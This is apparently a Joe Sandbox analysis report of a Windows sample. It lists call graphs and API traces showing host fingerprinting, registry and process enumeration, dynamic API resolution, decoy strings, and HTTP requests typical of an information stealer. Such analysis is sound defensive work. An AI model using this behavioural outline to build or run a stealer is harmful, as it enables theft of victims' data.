15053->15054 15055 dd1dcf 15054->15055 15056 dda9b0 4 API calls 15055->15056 15057 dd1df0 15056->15057 15058 dda8a0 lstrcpy 15057->15058 15059 dd1df9 15058->15059 15720 dd7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15059->15720 15062 dda9b0 4 API calls 15063 dd1e19 15062->15063 15064 dda8a0 lstrcpy 15063->15064 15065 dd1e22 15064->15065 15066 dda9b0 4 API calls 15065->15066 15067 dd1e41 15066->15067 15068 dda8a0 lstrcpy 15067->15068 15069 dd1e4a 15068->15069 15070 dda9b0 4 API calls 15069->15070 15071 dd1e6b 15070->15071 15072 dda8a0 lstrcpy 15071->15072 15073 dd1e74 15072->15073 15722 dd7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15073->15722 15076 dda9b0 4 API calls 15077 dd1e94 15076->15077 15078 dda8a0 lstrcpy 15077->15078 15079 dd1e9d 15078->15079 15080 dda9b0 4 API calls 15079->15080 15081 dd1ebc 15080->15081 15082 dda8a0 lstrcpy 15081->15082 15083 dd1ec5 15082->15083 15084 dda9b0 4 API calls 15083->15084 15085 dd1ee5 15084->15085 15086 dda8a0 lstrcpy 15085->15086 15087 dd1eee 15086->15087 15725 dd7b00 GetUserDefaultLocaleName 15087->15725 15090 dda9b0 4 API calls 15091 dd1f0e 15090->15091 15092 dda8a0 lstrcpy 15091->15092 15093 dd1f17 15092->15093 15094 dda9b0 4 API calls 15093->15094 15095 dd1f36 15094->15095 15096 dda8a0 lstrcpy 15095->15096 15097 dd1f3f 15096->15097 15098 dda9b0 4 API calls 15097->15098 15099 dd1f60 15098->15099 15100 dda8a0 lstrcpy 15099->15100 15101 dd1f69 15100->15101 15729 dd7b90 15101->15729 15103 dd1f80 15104 dda920 3 API calls 15103->15104 15105 dd1f93 15104->15105 15106 dda8a0 lstrcpy 15105->15106 15107 dd1f9c 15106->15107 15108 dda9b0 4 API calls 15107->15108 15109 dd1fc6 15108->15109 15110 dda8a0 lstrcpy 15109->15110 15111 dd1fcf 15110->15111 15112 dda9b0 4 API calls 15111->15112 15113 dd1fef 15112->15113 15114 dda8a0 lstrcpy 15113->15114 15115 dd1ff8 15114->15115 15741 dd7d80 GetSystemPowerStatus 15115->15741 15118 dda9b0 4 API calls 15119 dd2018 15118->15119 15120 dda8a0 lstrcpy 15119->15120 15121 
dd2021 15120->15121 15122 dda9b0 4 API calls 15121->15122 15123 dd2040 15122->15123 15124 dda8a0 lstrcpy 15123->15124 15125 dd2049 15124->15125 15126 dda9b0 4 API calls 15125->15126 15127 dd206a 15126->15127 15128 dda8a0 lstrcpy 15127->15128 15129 dd2073 15128->15129 15130 dd207e GetCurrentProcessId 15129->15130 15743 dd9470 OpenProcess 15130->15743 15133 dda920 3 API calls 15134 dd20a4 15133->15134 15135 dda8a0 lstrcpy 15134->15135 15136 dd20ad 15135->15136 15137 dda9b0 4 API calls 15136->15137 15138 dd20d7 15137->15138 15139 dda8a0 lstrcpy 15138->15139 15140 dd20e0 15139->15140 15141 dda9b0 4 API calls 15140->15141 15142 dd2100 15141->15142 15143 dda8a0 lstrcpy 15142->15143 15144 dd2109 15143->15144 15748 dd7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15144->15748 15147 dda9b0 4 API calls 15148 dd2129 15147->15148 15149 dda8a0 lstrcpy 15148->15149 15150 dd2132 15149->15150 15151 dda9b0 4 API calls 15150->15151 15152 dd2151 15151->15152 15153 dda8a0 lstrcpy 15152->15153 15154 dd215a 15153->15154 15155 dda9b0 4 API calls 15154->15155 15156 dd217b 15155->15156 15157 dda8a0 lstrcpy 15156->15157 15158 dd2184 15157->15158 15752 dd7f60 15158->15752 15161 dda9b0 4 API calls 15162 dd21a4 15161->15162 15163 dda8a0 lstrcpy 15162->15163 15164 dd21ad 15163->15164 15165 dda9b0 4 API calls 15164->15165 15166 dd21cc 15165->15166 15167 dda8a0 lstrcpy 15166->15167 15168 dd21d5 15167->15168 15169 dda9b0 4 API calls 15168->15169 15170 dd21f6 15169->15170 15171 dda8a0 lstrcpy 15170->15171 15172 dd21ff 15171->15172 15765 dd7ed0 GetSystemInfo wsprintfA 15172->15765 15175 dda9b0 4 API calls 15176 dd221f 15175->15176 15177 dda8a0 lstrcpy 15176->15177 15178 dd2228 15177->15178 15179 dda9b0 4 API calls 15178->15179 15180 dd2247 15179->15180 15181 dda8a0 lstrcpy 15180->15181 15182 dd2250 15181->15182 15183 dda9b0 4 API calls 15182->15183 15184 dd2270 15183->15184 15185 dda8a0 lstrcpy 15184->15185 15186 dd2279 15185->15186 15767 dd8100 GetProcessHeap RtlAllocateHeap 15186->15767 15189 
dda9b0 4 API calls 15190 dd2299 15189->15190 15191 dda8a0 lstrcpy 15190->15191 15192 dd22a2 15191->15192 15193 dda9b0 4 API calls 15192->15193 15194 dd22c1 15193->15194 15195 dda8a0 lstrcpy 15194->15195 15196 dd22ca 15195->15196 15197 dda9b0 4 API calls 15196->15197 15198 dd22eb 15197->15198 15199 dda8a0 lstrcpy 15198->15199 15200 dd22f4 15199->15200 15773 dd87c0 15200->15773 15203 dda920 3 API calls 15204 dd231e 15203->15204 15205 dda8a0 lstrcpy 15204->15205 15206 dd2327 15205->15206 15207 dda9b0 4 API calls 15206->15207 15208 dd2351 15207->15208 15209 dda8a0 lstrcpy 15208->15209 15210 dd235a 15209->15210 15211 dda9b0 4 API calls 15210->15211 15212 dd237a 15211->15212 15213 dda8a0 lstrcpy 15212->15213 15214 dd2383 15213->15214 15215 dda9b0 4 API calls 15214->15215 15216 dd23a2 15215->15216 15217 dda8a0 lstrcpy 15216->15217 15218 dd23ab 15217->15218 15778 dd81f0 15218->15778 15220 dd23c2 15221 dda920 3 API calls 15220->15221 15222 dd23d5 15221->15222 15223 dda8a0 lstrcpy 15222->15223 15224 dd23de 15223->15224 15225 dda9b0 4 API calls 15224->15225 15226 dd240a 15225->15226 15227 dda8a0 lstrcpy 15226->15227 15228 dd2413 15227->15228 15229 dda9b0 4 API calls 15228->15229 15230 dd2432 15229->15230 15231 dda8a0 lstrcpy 15230->15231 15232 dd243b 15231->15232 15233 dda9b0 4 API calls 15232->15233 15234 dd245c 15233->15234 15235 dda8a0 lstrcpy 15234->15235 15236 dd2465 15235->15236 15237 dda9b0 4 API calls 15236->15237 15238 dd2484 15237->15238 15239 dda8a0 lstrcpy 15238->15239 15240 dd248d 15239->15240 15241 dda9b0 4 API calls 15240->15241 15242 dd24ae 15241->15242 15243 dda8a0 lstrcpy 15242->15243 15244 dd24b7 15243->15244 15786 dd8320 15244->15786 15246 dd24d3 15247 dda920 3 API calls 15246->15247 15248 dd24e6 15247->15248 15249 dda8a0 lstrcpy 15248->15249 15250 dd24ef 15249->15250 15251 dda9b0 4 API calls 15250->15251 15252 dd2519 15251->15252 15253 dda8a0 lstrcpy 15252->15253 15254 dd2522 15253->15254 15255 dda9b0 4 API calls 15254->15255 15256 dd2543 15255->15256 
15257 dda8a0 lstrcpy 15256->15257 15258 dd254c 15257->15258 15259 dd8320 17 API calls 15258->15259 15260 dd2568 15259->15260 15261 dda920 3 API calls 15260->15261 15262 dd257b 15261->15262 15263 dda8a0 lstrcpy 15262->15263 15264 dd2584 15263->15264 15265 dda9b0 4 API calls 15264->15265 15266 dd25ae 15265->15266 15267 dda8a0 lstrcpy 15266->15267 15268 dd25b7 15267->15268 15269 dda9b0 4 API calls 15268->15269 15270 dd25d6 15269->15270 15271 dda8a0 lstrcpy 15270->15271 15272 dd25df 15271->15272 15273 dda9b0 4 API calls 15272->15273 15274 dd2600 15273->15274 15275 dda8a0 lstrcpy 15274->15275 15276 dd2609 15275->15276 15822 dd8680 15276->15822 15278 dd2620 15279 dda920 3 API calls 15278->15279 15280 dd2633 15279->15280 15281 dda8a0 lstrcpy 15280->15281 15282 dd263c 15281->15282 15283 dd265a lstrlen 15282->15283 15284 dd266a 15283->15284 15285 dda740 lstrcpy 15284->15285 15286 dd267c 15285->15286 15287 dc1590 lstrcpy 15286->15287 15288 dd268d 15287->15288 15832 dd5190 15288->15832 15290 dd2699 15290->13722 16020 ddaad0 15291->16020 15293 dc5009 InternetOpenUrlA 15296 dc5021 15293->15296 15294 dc502a InternetReadFile 15294->15296 15295 dc50a0 InternetCloseHandle InternetCloseHandle 15297 dc50ec 15295->15297 15296->15294 15296->15295 15297->13726 16021 dc98d0 15298->16021 15300 dd0759 15301 dd077d 15300->15301 15302 dd0a38 15300->15302 15304 dd0799 StrCmpCA 15301->15304 15303 dc1590 lstrcpy 15302->15303 15305 dd0a49 15303->15305 15306 dd07a8 15304->15306 15335 dd0843 15304->15335 16197 dd0250 15305->16197 15308 dda7a0 lstrcpy 15306->15308 15310 dd07c3 15308->15310 15313 dc1590 lstrcpy 15310->15313 15311 dd0865 StrCmpCA 15312 dd0874 15311->15312 15316 dd096b 15311->15316 15314 dda740 lstrcpy 15312->15314 15315 dd080c 15313->15315 15318 dd0881 15314->15318 15319 dda7a0 lstrcpy 15315->15319 15317 dd099c StrCmpCA 15316->15317 15320 dd09ab 15317->15320 15321 dd0a2d 15317->15321 15322 dda9b0 4 API calls 15318->15322 15323 dd0823 15319->15323 15324 dc1590 lstrcpy 15320->15324 
15321->13730 15325 dd08ac 15322->15325 15326 dda7a0 lstrcpy 15323->15326 15327 dd09f4 15324->15327 15328 dda920 3 API calls 15325->15328 15329 dd083e 15326->15329 15330 dda7a0 lstrcpy 15327->15330 15331 dd08b3 15328->15331 16024 dcfb00 15329->16024 15333 dd0a0d 15330->15333 15334 dda9b0 4 API calls 15331->15334 15336 dda7a0 lstrcpy 15333->15336 15337 dd08ba 15334->15337 15335->15311 15338 dd0a28 15336->15338 15339 dda8a0 lstrcpy 15337->15339 16140 dd0030 15338->16140 15672 dda7a0 lstrcpy 15671->15672 15673 dc1683 15672->15673 15674 dda7a0 lstrcpy 15673->15674 15675 dc1695 15674->15675 15676 dda7a0 lstrcpy 15675->15676 15677 dc16a7 15676->15677 15678 dda7a0 lstrcpy 15677->15678 15679 dc15a3 15678->15679 15679->14553 15681 dc47c6 15680->15681 15682 dc4838 lstrlen 15681->15682 15706 ddaad0 15682->15706 15684 dc4848 InternetCrackUrlA 15685 dc4867 15684->15685 15685->14630 15687 dda740 lstrcpy 15686->15687 15688 dd8b74 15687->15688 15689 dda740 lstrcpy 15688->15689 15690 dd8b82 GetSystemTime 15689->15690 15691 dd8b99 15690->15691 15692 dda7a0 lstrcpy 15691->15692 15693 dd8bfc 15692->15693 15693->14645 15696 dda931 15694->15696 15695 dda988 15697 dda7a0 lstrcpy 15695->15697 15696->15695 15698 dda968 lstrcpy lstrcat 15696->15698 15699 dda994 15697->15699 15698->15695 15699->14649 15700->14763 15702 dc9af9 LocalAlloc 15701->15702 15703 dc4eee 15701->15703 15702->15703 15704 dc9b14 CryptStringToBinaryA 15702->15704 15703->14651 15703->14654 15704->15703 15705 dc9b39 LocalFree 15704->15705 15705->15703 15706->15684 15707->14773 15708->14914 15709->14916 15710->14924 15839 dd77a0 15711->15839 15714 dd1c1e 15714->15006 15715 dd76c6 RegOpenKeyExA 15716 dd7704 RegCloseKey 15715->15716 15717 dd76e7 RegQueryValueExA 15715->15717 15716->15714 15717->15716 15719 dd1c99 15718->15719 15719->15020 15721 dd1e09 15720->15721 15721->15062 15723 dd7a9a wsprintfA 15722->15723 15724 dd1e84 15722->15724 15723->15724 15724->15076 15726 dd7b4d 15725->15726 15727 dd1efe 15725->15727 15846 dd8d20 
LocalAlloc CharToOemW 15726->15846 15727->15090 15730 dda740 lstrcpy 15729->15730 15731 dd7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15730->15731 15740 dd7c25 15731->15740 15732 dd7d18 15734 dd7d1e LocalFree 15732->15734 15735 dd7d28 15732->15735 15733 dd7c46 GetLocaleInfoA 15733->15740 15734->15735 15736 dda7a0 lstrcpy 15735->15736 15739 dd7d37 15736->15739 15737 dda8a0 lstrcpy 15737->15740 15738 dda9b0 lstrcpy lstrlen lstrcpy lstrcat 15738->15740 15739->15103 15740->15732 15740->15733 15740->15737 15740->15738 15742 dd2008 15741->15742 15742->15118 15744 dd94b5 15743->15744 15745 dd9493 GetModuleFileNameExA CloseHandle 15743->15745 15746 dda740 lstrcpy 15744->15746 15745->15744 15747 dd2091 15746->15747 15747->15133 15749 dd7e68 RegQueryValueExA 15748->15749 15750 dd2119 15748->15750 15751 dd7e8e RegCloseKey 15749->15751 15750->15147 15751->15750 15753 dd7fb9 GetLogicalProcessorInformationEx 15752->15753 15754 dd7fd8 GetLastError 15753->15754 15760 dd8029 15753->15760 15763 dd8022 15754->15763 15764 dd7fe3 15754->15764 15756 dd2194 15756->15161 15758 dd89f0 2 API calls 15761 dd807b 15758->15761 15759 dd89f0 2 API calls 15759->15756 15760->15758 15762 dd8084 wsprintfA 15761->15762 15761->15763 15762->15756 15763->15756 15763->15759 15764->15753 15764->15756 15847 dd89f0 15764->15847 15850 dd8a10 GetProcessHeap RtlAllocateHeap 15764->15850 15766 dd220f 15765->15766 15766->15175 15768 dd89b0 15767->15768 15769 dd814d GlobalMemoryStatusEx 15768->15769 15770 dd8163 15769->15770 15771 dd819b wsprintfA 15770->15771 15772 dd2289 15771->15772 15772->15189 15774 dd87fb GetProcessHeap RtlAllocateHeap wsprintfA 15773->15774 15776 dda740 lstrcpy 15774->15776 15777 dd230b 15776->15777 15777->15203 15779 dda740 lstrcpy 15778->15779 15780 dd8229 15779->15780 15781 dd8263 15780->15781 15784 dda9b0 lstrcpy lstrlen lstrcpy lstrcat 15780->15784 15785 dda8a0 lstrcpy 15780->15785 15782 dda7a0 lstrcpy 15781->15782 15783 dd82dc 15782->15783 15783->15220 15784->15780 
15785->15780 15787 dda740 lstrcpy 15786->15787 15788 dd835c RegOpenKeyExA 15787->15788 15789 dd83ae 15788->15789 15790 dd83d0 15788->15790 15791 dda7a0 lstrcpy 15789->15791 15792 dd83f8 RegEnumKeyExA 15790->15792 15793 dd8613 RegCloseKey 15790->15793 15802 dd83bd 15791->15802 15795 dd843f wsprintfA RegOpenKeyExA 15792->15795 15796 dd860e 15792->15796 15794 dda7a0 lstrcpy 15793->15794 15794->15802 15797 dd8485 RegCloseKey RegCloseKey 15795->15797 15798 dd84c1 RegQueryValueExA 15795->15798 15796->15793 15801 dda7a0 lstrcpy 15797->15801 15799 dd84fa lstrlen 15798->15799 15800 dd8601 RegCloseKey 15798->15800 15799->15800 15803 dd8510 15799->15803 15800->15796 15801->15802 15802->15246 15804 dda9b0 4 API calls 15803->15804 15805 dd8527 15804->15805 15806 dda8a0 lstrcpy 15805->15806 15807 dd8533 15806->15807 15808 dda9b0 4 API calls 15807->15808 15809 dd8557 15808->15809 15810 dda8a0 lstrcpy 15809->15810 15811 dd8563 15810->15811 15812 dd856e RegQueryValueExA 15811->15812 15812->15800 15813 dd85a3 15812->15813 15814 dda9b0 4 API calls 15813->15814 15815 dd85ba 15814->15815 15816 dda8a0 lstrcpy 15815->15816 15817 dd85c6 15816->15817 15818 dda9b0 4 API calls 15817->15818 15819 dd85ea 15818->15819 15820 dda8a0 lstrcpy 15819->15820 15821 dd85f6 15820->15821 15821->15800 15823 dda740 lstrcpy 15822->15823 15824 dd86bc CreateToolhelp32Snapshot Process32First 15823->15824 15825 dd875d CloseHandle 15824->15825 15826 dd86e8 Process32Next 15824->15826 15827 dda7a0 lstrcpy 15825->15827 15826->15825 15830 dd86fd 15826->15830 15829 dd8776 15827->15829 15828 dda9b0 lstrcpy lstrlen lstrcpy lstrcat 15828->15830 15829->15278 15830->15826 15830->15828 15831 dda8a0 lstrcpy 15830->15831 15831->15830 15833 dda7a0 lstrcpy 15832->15833 15834 dd51b5 15833->15834 15835 dc1590 lstrcpy 15834->15835 15836 dd51c6 15835->15836 15851 dc5100 15836->15851 15838 dd51cf 15838->15290 15842 dd7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15839->15842 15841 dd76b9 15841->15714 15841->15715 15843 dd7765 
RegQueryValueExA 15842->15843 15844 dd7780 RegCloseKey 15842->15844 15843->15844 15845 dd7793 15844->15845 15845->15841 15846->15727 15848 dd8a0c 15847->15848 15849 dd89f9 GetProcessHeap HeapFree 15847->15849 15848->15764 15849->15848 15850->15764 15852 dda7a0 lstrcpy 15851->15852 15853 dc5119 15852->15853 15854 dc47b0 2 API calls 15853->15854 15855 dc5125 15854->15855 16011 dd8ea0 15855->16011 15857 dc5184 15858 dc5192 lstrlen 15857->15858 15859 dc51a5 15858->15859 15860 dd8ea0 4 API calls 15859->15860 15861 dc51b6 15860->15861 15862 dda740 lstrcpy 15861->15862 15863 dc51c9 15862->15863 15864 dda740 lstrcpy 15863->15864 15865 dc51d6 15864->15865 15866 dda740 lstrcpy 15865->15866 15867 dc51e3 15866->15867 15868 dda740 lstrcpy 15867->15868 15869 dc51f0 15868->15869 15870 dda740 lstrcpy 15869->15870 15871 dc51fd InternetOpenA StrCmpCA 15870->15871 15872 dc522f 15871->15872 15873 dc58c4 InternetCloseHandle 15872->15873 15874 dd8b60 3 API calls 15872->15874 15880 dc58d9 codecvt 15873->15880 15875 dc524e 15874->15875 15876 dda920 3 API calls 15875->15876 15877 dc5261 15876->15877 15878 dda8a0 lstrcpy 15877->15878 15879 dc526a 15878->15879 15881 dda9b0 4 API calls 15879->15881 15884 dda7a0 lstrcpy 15880->15884 15882 dc52ab 15881->15882 15883 dda920 3 API calls 15882->15883 15885 dc52b2 15883->15885 15892 dc5913 15884->15892 15886 dda9b0 4 API calls 15885->15886 15887 dc52b9 15886->15887 15888 dda8a0 lstrcpy 15887->15888 15889 dc52c2 15888->15889 15890 dda9b0 4 API calls 15889->15890 15891 dc5303 15890->15891 15893 dda920 3 API calls 15891->15893 15892->15838 15894 dc530a 15893->15894 15895 dda8a0 lstrcpy 15894->15895 15896 dc5313 15895->15896 15897 dc5329 InternetConnectA 15896->15897 15897->15873 15898 dc5359 HttpOpenRequestA 15897->15898 15900 dc58b7 InternetCloseHandle 15898->15900 15901 dc53b7 15898->15901 15900->15873 15902 dda9b0 4 API calls 15901->15902 15903 dc53cb 15902->15903 15904 dda8a0 lstrcpy 15903->15904 15905 dc53d4 15904->15905 15906 dda920 3 API calls 
15905->15906 15907 dc53f2 15906->15907 15908 dda8a0 lstrcpy 15907->15908 15909 dc53fb 15908->15909 15910 dda9b0 4 API calls 15909->15910 15911 dc541a 15910->15911 15912 dda8a0 lstrcpy 15911->15912 15913 dc5423 15912->15913 15914 dda9b0 4 API calls 15913->15914 15915 dc5444 15914->15915 15916 dda8a0 lstrcpy 15915->15916 15917 dc544d 15916->15917 15918 dda9b0 4 API calls 15917->15918 15919 dc546e 15918->15919 15920 dda8a0 lstrcpy 15919->15920 15921 dc5477 15920->15921 16012 dd8ead CryptBinaryToStringA 16011->16012 16013 dd8ea9 16011->16013 16012->16013 16014 dd8ece GetProcessHeap RtlAllocateHeap 16012->16014 16013->15857 16014->16013 16015 dd8ef4 codecvt 16014->16015 16016 dd8f05 CryptBinaryToStringA 16015->16016 16016->16013 16020->15293 16263 dc9880 16021->16263 16023 dc98e1 16023->15300 16025 dda740 lstrcpy 16024->16025 16026 dcfb16 16025->16026 16198 dda740 lstrcpy 16197->16198 16199 dd0266 16198->16199 16200 dd8de0 2 API calls 16199->16200 16201 dd027b 16200->16201 16202 dda920 3 API calls 16201->16202 16203 dd028b 16202->16203 16204 dda8a0 lstrcpy 16203->16204 16205 dd0294 16204->16205 16206 dda9b0 4 API calls 16205->16206 16207 dd02b8 16206->16207 16264 dc988e 16263->16264 16267 dc6fb0 16264->16267 16266 dc98ad codecvt 16266->16023 16270 dc6d40 16267->16270 16271 dc6d63 16270->16271 16283 dc6d59 16270->16283 16271->16283 16284 dc6660 16271->16284 16273 dc6dbe 16273->16283 16290 dc69b0 16273->16290 16275 dc6e2a 16276 dc6ee6 VirtualFree 16275->16276 16278 dc6ef7 16275->16278 16275->16283 16276->16278 16277 dc6f41 16279 dd89f0 2 API calls 16277->16279 16277->16283 16278->16277 16280 dc6f38 16278->16280 16281 dc6f26 FreeLibrary 16278->16281 16279->16283 16282 dd89f0 2 API calls 16280->16282 16281->16278 16282->16277 16283->16266 16287 dc668f VirtualAlloc 16284->16287 16286 dc6730 16288 dc673c 16286->16288 16289 dc6743 VirtualAlloc 16286->16289 16287->16286 16287->16288 16288->16273 16289->16288 16291 dc69c9 16290->16291 16295 dc69d5 16290->16295 16292 dc6a09 
LoadLibraryA 16291->16292 16291->16295 16293 dc6a32 16292->16293 16292->16295 16296 dc6ae0 16293->16296 16300 dd8a10 GetProcessHeap RtlAllocateHeap 16293->16300 16295->16275 16296->16295 16298 dc6ba8 GetProcAddress 16296->16298 16297 dc6a8b 16297->16295 16299 dd89f0 2 API calls 16297->16299 16298->16295 16298->16296 16299->16296 16300->16297

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 dd9860-dd9874 call dd9750 663 dd987a-dd9a8e call dd9780 GetProcAddress * 21 660->663 664 dd9a93-dd9af2 LoadLibraryA * 5 660->664 663->664 666 dd9b0d-dd9b14 664->666 667 dd9af4-dd9b08 GetProcAddress 664->667 669 dd9b46-dd9b4d 666->669 670 dd9b16-dd9b41 GetProcAddress * 2 666->670 667->666 671 dd9b4f-dd9b63 GetProcAddress 669->671 672 dd9b68-dd9b6f 669->672 670->669 671->672 673 dd9b89-dd9b90 672->673 674 dd9b71-dd9b84 GetProcAddress 672->674 675 dd9bc1-dd9bc2 673->675 676 dd9b92-dd9bbc GetProcAddress * 2 673->676 674->673 676->675
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01622470), ref: 00DD98A1
                                • GetProcAddress.KERNEL32(74DD0000,016222F0), ref: 00DD98BA
                                • GetProcAddress.KERNEL32(74DD0000,01622290), ref: 00DD98D2
                                • GetProcAddress.KERNEL32(74DD0000,016223E0), ref: 00DD98EA
                                • GetProcAddress.KERNEL32(74DD0000,016224A0), ref: 00DD9903
                                • GetProcAddress.KERNEL32(74DD0000,01628F38), ref: 00DD991B
                                • GetProcAddress.KERNEL32(74DD0000,01615910), ref: 00DD9933
                                • GetProcAddress.KERNEL32(74DD0000,01615930), ref: 00DD994C
                                • GetProcAddress.KERNEL32(74DD0000,01622218), ref: 00DD9964
                                • GetProcAddress.KERNEL32(74DD0000,016223B0), ref: 00DD997C
                                • GetProcAddress.KERNEL32(74DD0000,01622320), ref: 00DD9995
                                • GetProcAddress.KERNEL32(74DD0000,01622440), ref: 00DD99AD
                                • GetProcAddress.KERNEL32(74DD0000,016159B0), ref: 00DD99C5
                                • GetProcAddress.KERNEL32(74DD0000,016222A8), ref: 00DD99DE
                                • GetProcAddress.KERNEL32(74DD0000,01622338), ref: 00DD99F6
                                • GetProcAddress.KERNEL32(74DD0000,016156F0), ref: 00DD9A0E
                                • GetProcAddress.KERNEL32(74DD0000,01622428), ref: 00DD9A27
                                • GetProcAddress.KERNEL32(74DD0000,016223F8), ref: 00DD9A3F
                                • GetProcAddress.KERNEL32(74DD0000,016158D0), ref: 00DD9A57
                                • GetProcAddress.KERNEL32(74DD0000,016222D8), ref: 00DD9A70
                                • GetProcAddress.KERNEL32(74DD0000,016159D0), ref: 00DD9A88
                                • LoadLibraryA.KERNEL32(01622350,?,00DD6A00), ref: 00DD9A9A
                                • LoadLibraryA.KERNEL32(01622368,?,00DD6A00), ref: 00DD9AAB
                                • LoadLibraryA.KERNEL32(016223C8,?,00DD6A00), ref: 00DD9ABD
                                • LoadLibraryA.KERNEL32(01622410,?,00DD6A00), ref: 00DD9ACF
                                • LoadLibraryA.KERNEL32(01622458,?,00DD6A00), ref: 00DD9AE0
                                • GetProcAddress.KERNEL32(75A70000,016224B8), ref: 00DD9B02
                                • GetProcAddress.KERNEL32(75290000,016224D0), ref: 00DD9B23
                                • GetProcAddress.KERNEL32(75290000,016224E8), ref: 00DD9B3B
                                • GetProcAddress.KERNEL32(75BD0000,01622230), ref: 00DD9B5D
                                • GetProcAddress.KERNEL32(75450000,01615A50), ref: 00DD9B7E
                                • GetProcAddress.KERNEL32(76E90000,01629018), ref: 00DD9B9F
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00DD9BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00DD9BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: b0af6d8fd399dc5e388481ccdc14e734d4bc26e80456a6c38ff9fb0773cfe411
                                • Instruction ID: 908a9597e08e3d89ea49ce3b862da8ebf169da991e1a77c9c439ad12a93940be
                                • Opcode Fuzzy Hash: b0af6d8fd399dc5e388481ccdc14e734d4bc26e80456a6c38ff9fb0773cfe411
                                • Instruction Fuzzy Hash: D4A10BB5710340EFD366EFA8E998A5637F9F78C301F14855AA68A8324CD73F9941CB60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 dc45c0-dc4695 RtlAllocateHeap 781 dc46a0-dc46a6 764->781 782 dc46ac-dc474a 781->782 783 dc474f-dc47a9 VirtualProtect 781->783 782->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DC460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00DC479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC45D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC46D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC46C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC45F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC46AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC46B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC45C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC45E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC471E
